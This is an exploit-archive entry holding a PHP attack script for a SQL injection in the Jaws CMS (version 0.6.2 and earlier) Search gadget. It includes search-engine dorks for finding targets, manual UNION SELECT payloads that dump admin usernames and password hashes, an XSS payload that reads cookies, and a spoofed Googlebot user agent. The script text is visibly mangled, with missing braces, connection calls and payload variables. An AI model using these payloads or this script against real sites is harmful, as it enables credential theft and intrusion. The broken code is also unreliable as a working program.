Jaws <= 0.6.2 (Search gadget) Remote SQL Injection Exploit

ID 1337DAY-ID-542
Type zdt
Reporter rgod
Modified 2006-06-23T00:00:00


Exploit for unknown platform in category web applications

Jaws <= 0.6.2 (Search gadget) Remote SQL Injection Exploit

#!/usr/bin/php -q -d short_open_tag=on
echo "Jaws <= 0.6.2 'Search gadget' SQL injection / admin credentials disclosure\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search\r\n\r\n";
works regardless of php.ini settings
if 'Search gadget' is enabled

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to jaws\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from default (no prefix)\r\n";
echo "                try blog_ even\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /jaws/ \r\n";
echo "php ".$argv[0]." localhost /jaws/ -Tblog_\r\n";

# software site: http://www.jaws-project.com/
# manual exploitation:
# i)sql injection:
#   go to http://[target]/[path_to_jaws]/?gadget=Search
#   if search module is enabled, in search field type:
#   1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/users/**/WHERE/**/id=1/*
#   or
#   1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/blog_users/**/WHERE/**/id=1/*
#   now at screen you have admin username & password hash
#   this works with magic_quotes_gpc both on & off
# ii)xss:
#    http://[target]/[path_to_jaws]/gadgets/RssReader/extras/magpierss/scripts/magpie_slashbox.php?rss_url=<script>alert(document.cookie)</script>


function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    if (!$ock) {
      echo 'No response from proxy...';die;
  if ($proxy=='') {
    while (!feof($ock)) {
  else {
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;

function is_hash($hash)
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}

for ($i=3; $i<=$argc-1; $i++){
if ($temp=="-p")
if ($temp=="-P")
if ($temp=="-T")
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
if (eregi("Gadget is not enabled",$html))
die("search gadget is not enabled... exploit failed");
if (($admin<>'') and ($hash<>'') and (is_hash($hash)))
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$hash."\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "Exploit failed, maybe wrong table prefix...";

#  0day.today [2018-01-04]  #